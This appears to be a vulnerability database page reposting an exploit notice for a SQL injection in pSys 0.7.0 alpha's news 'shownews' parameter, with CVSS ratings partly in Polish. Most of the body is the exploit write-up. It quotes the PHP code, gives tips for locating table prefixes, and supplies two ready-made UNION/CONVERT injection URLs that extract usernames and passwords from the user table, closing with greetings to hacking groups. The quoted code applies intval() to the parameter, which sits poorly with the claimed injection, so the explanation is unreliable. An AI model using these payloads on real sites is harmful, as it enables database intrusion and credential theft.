pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability

2008.11.30
Credit: h0yt3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

###################### # #pSys - 0.7.0. alpha shownews SQL Injection # ###################### # #Bug by: h0yt3r # ## ### ## # #Bug in here: # # if (isset($_REQUEST['shownews']) && $_REQUEST['shownews'] != "") { # $sqlbefehl="Select titel from $tab_news Where id = '".intval($_REQUEST['shownews'])."'"; # $gettitel = mysql_query($sqlbefehl,$serverid); # $news=mysql_fetch_array($gettitel); # $pagetitle = $pset['systitle']." - ".htmlspecialchars($news['titel']); # //Hit Count # $sqlbefehl = "Update $tab_news Set Counter=Counter+1 Where id = '".intval($_REQUEST['shownews'])."'"; # @mysql_query($sqlbefehl,$serverid); # } # # #Ok, as we can see the script uses intval to convert the value of $shownews to an integer, #so a normal Select Injection would return nothing. #But it is still possible to inject and echo the right values using a simple CONVERT() or CAST() subquery. #Make sure that your subquery returns only one row by setting limit n,1. # #In standard configuration the table prefix is "ps_". But it also can be somethin like "powie_" #like it is set in version 0.69. #Remember that you can use information_schema.tables when mySQL Version >= 5 for finding prefixes and names. # #And by the way Powie uses a nice password encryption style, so have fun with it: # # if ($checkuser == 1) { # srand((double)microtime() * 1000000); # $newpass = md5(uniqid(rand())); # $pwd = substr($newpass, 0, 10); # } # #SQL Injection: #http://[target]/[path]/news/index.php?shownews=[SQL+SUBQUERY] # #PoC: #/news/index.php?shownews=-1'UnIoN/**/SeLeCt/**/1,CoNvErT((SeLeCt/**/CoNcAt(username,0x3a,pwd)/**/FrOm/**/powie_pfuser/**/LiMit/**/0,1),ChAr(99)),3,4,5,6,7,8,9,10,11,12,13/* #/news/index.php?shownews=-1'UnIoN/**/SeLeCt/**/1,CaSt((SeLeCt/**/CoNcAt(username,0x3a,pwd)/**/FrOm/**/ps_pfuser/**/LiMit/**/0,1)/**/AS/**/ChAr),3,4,5,6,7,8,9,10,11,12,13/* # ####################### # #Greetz to thund3r, b!zZ!t, ramon, Sys-Flaw, Free-Hack and the great h4ck-y0u Team! # ####################### #######################

Referencje:

http://xforce.iss.net/xforce/xfdb/42916
http://www.milw0rm.com/exploits/5745


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top